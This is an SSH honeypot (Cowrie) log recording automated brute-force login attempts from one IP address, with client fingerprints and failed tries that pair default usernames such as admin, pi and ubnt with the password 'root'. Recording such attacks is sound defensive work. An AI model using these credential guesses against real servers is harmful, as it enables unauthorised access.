{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":40608,"dst_ip":"1.2.3.4","dst_port":22,"session":"cfcaa1def229","protocol":"ssh","message":"New connection: 87.120.191.13:40608 (1.2.3.4:22) [session: cfcaa1def229]","sensor":"my-vps","timestamp":"2025-08-26T13:58:30.360576Z"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:30.373982Z","src_ip":"87.120.191.13","session":"ffda43c172a0"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":40610,"dst_ip":"1.2.3.4","dst_port":22,"session":"c77afcd91271","protocol":"ssh","message":"New connection: 87.120.191.13:40610 (1.2.3.4:22) [session: c77afcd91271]","sensor":"my-vps","timestamp":"2025-08-26T13:58:30.386731Z"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":40622,"dst_ip":"1.2.3.4","dst_port":22,"session":"74c88529f76f","protocol":"ssh","message":"New connection: 87.120.191.13:40622 (1.2.3.4:22) [session: 74c88529f76f]","sensor":"my-vps","timestamp":"2025-08-26T13:58:30.394417Z"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":40626,"dst_ip":"1.2.3.4","dst_port":22,"session":"1d812d0fc7ef","protocol":"ssh","message":"New connection: 87.120.191.13:40626 (1.2.3.4:22) [session: 1d812d0fc7ef]","sensor":"my-vps","timestamp":"2025-08-26T13:58:30.410252Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:30.418485Z","src_ip":"87.120.191.13","session":"bb224bc80c4c"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:30.419486Z","src_ip":"87.120.191.13","session":"bb224bc80c4c"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:30.443902Z","src_ip":"87.120.191.13","session":"6f75dfff6011"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:30.446602Z","src_ip":"87.120.191.13","session":"6f75dfff6011"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:30.454959Z","src_ip":"87.120.191.13","session":"cfcaa1def229"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:30.455634Z","src_ip":"87.120.191.13","session":"cfcaa1def229"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:30.486620Z","src_ip":"87.120.191.13","session":"c77afcd91271"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:30.487627Z","src_ip":"87.120.191.13","session":"c77afcd91271"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:30.490887Z","src_ip":"87.120.191.13","session":"74c88529f76f"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:30.491787Z","src_ip":"87.120.191.13","session":"74c88529f76f"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:30.505184Z","src_ip":"87.120.191.13","session":"1d812d0fc7ef"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:30.505975Z","src_ip":"87.120.191.13","session":"1d812d0fc7ef"}
{"eventid":"cowrie.login.failed","username":"admin","password":"root","message":"login attempt [admin/root] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:30.758769Z","src_ip":"87.120.191.13","session":"ae69a46ab953"}
{"eventid":"cowrie.login.failed","username":"noc","password":"root","message":"login attempt [noc/root] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:30.808876Z","src_ip":"87.120.191.13","session":"bb224bc80c4c"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"root","message":"login attempt [ftpuser/root] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:30.844088Z","src_ip":"87.120.191.13","session":"cfcaa1def229"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"root","message":"login attempt [ftpuser/root] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:30.868088Z","src_ip":"87.120.191.13","session":"6f75dfff6011"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"root","message":"login attempt [ubnt/root] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:30.888861Z","src_ip":"87.120.191.13","session":"74c88529f76f"}
{"eventid":"cowrie.login.failed","username":"pi","password":"root","message":"login attempt [pi/root] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:30.911733Z","src_ip":"87.120.191.13","session":"1d812d0fc7ef"}
{"eventid":"cowrie.login.failed","username":"student","password":"root","message":"login attempt [student/root] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:30.921665Z","src_ip":"87.120.191.13","session":"c77afcd91271"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:31.204705Z","src_ip":"87.120.191.13","session":"6b58abb2a8af"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:31.852822Z","src_ip":"87.120.191.13","session":"ae69a46ab953"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":40650,"dst_ip":"1.2.3.4","dst_port":22,"session":"474c712c0a9b","protocol":"ssh","message":"New connection: 87.120.191.13:40650 (1.2.3.4:22) [session: 474c712c0a9b]","sensor":"my-vps","timestamp":"2025-08-26T13:58:31.874041Z"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:31.904505Z","src_ip":"87.120.191.13","session":"bb224bc80c4c"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:31.933184Z","src_ip":"87.120.191.13","session":"474c712c0a9b"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:31.934110Z","src_ip":"87.120.191.13","session":"474c712c0a9b"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:31.945359Z","src_ip":"87.120.191.13","session":"cfcaa1def229"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":40658,"dst_ip":"1.2.3.4","dst_port":22,"session":"e487b1789787","protocol":"ssh","message":"New connection: 87.120.191.13:40658 (1.2.3.4:22) [session: e487b1789787]","sensor":"my-vps","timestamp":"2025-08-26T13:58:31.953395Z"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:31.977978Z","src_ip":"87.120.191.13","session":"6f75dfff6011"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":40666,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff4a326db3a1","protocol":"ssh","message":"New connection: 87.120.191.13:40666 (1.2.3.4:22) [session: ff4a326db3a1]","sensor":"my-vps","timestamp":"2025-08-26T13:58:32.017158Z"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":40682,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e9d45a2776f","protocol":"ssh","message":"New connection: 87.120.191.13:40682 (1.2.3.4:22) [session: 0e9d45a2776f]","sensor":"my-vps","timestamp":"2025-08-26T13:58:32.047606Z"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:32.064647Z","src_ip":"87.120.191.13","session":"c77afcd91271"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:32.069529Z","src_ip":"87.120.191.13","session":"74c88529f76f"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:32.077119Z","src_ip":"87.120.191.13","session":"e487b1789787"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:32.078454Z","src_ip":"87.120.191.13","session":"e487b1789787"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":40692,"dst_ip":"1.2.3.4","dst_port":22,"session":"5aa8844fc4cf","protocol":"ssh","message":"New connection: 87.120.191.13:40692 (1.2.3.4:22) [session: 5aa8844fc4cf]","sensor":"my-vps","timestamp":"2025-08-26T13:58:32.110242Z"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:32.116277Z","src_ip":"87.120.191.13","session":"1d812d0fc7ef"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":40698,"dst_ip":"1.2.3.4","dst_port":22,"session":"1df20127701f","protocol":"ssh","message":"New connection: 87.120.191.13:40698 (1.2.3.4:22) [session: 1df20127701f]","sensor":"my-vps","timestamp":"2025-08-26T13:58:32.134460Z"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":40702,"dst_ip":"1.2.3.4","dst_port":22,"session":"8080dc0d91b6","protocol":"ssh","message":"New connection: 87.120.191.13:40702 (1.2.3.4:22) [session: 8080dc0d91b6]","sensor":"my-vps","timestamp":"2025-08-26T13:58:32.144932Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:32.203920Z","src_ip":"87.120.191.13","session":"ff4a326db3a1"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:32.205137Z","src_ip":"87.120.191.13","session":"ff4a326db3a1"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:32.279471Z","src_ip":"87.120.191.13","session":"0e9d45a2776f"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:32.280531Z","src_ip":"87.120.191.13","session":"0e9d45a2776f"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:32.405839Z","src_ip":"87.120.191.13","session":"5aa8844fc4cf"}
